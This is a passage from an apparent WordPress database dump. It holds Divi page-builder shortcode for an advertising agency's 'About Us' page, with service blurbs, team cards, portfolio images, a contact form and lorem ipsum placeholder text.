box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.5.2\" hover_enabled=\"0\" min_length=\"10\" max_length=\"10\" allowed_symbols=\"numbers\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-08-07 18:28:21','2020-08-07 18:28:21','',134,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/134-revision-v1/',0,'revision','',0),(532,1,'2020-08-07 18:34:36','2020-08-07 18:34:36','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"4.5.2\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/WhyWE.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\" alt=\"about WhatTheHell?\" title_text=\"whatthehell about us\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"100ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" locked=\"off\" alt=\"Creative graphic designing \" title_text=\"Creative graphic designing \"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.5.2\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" 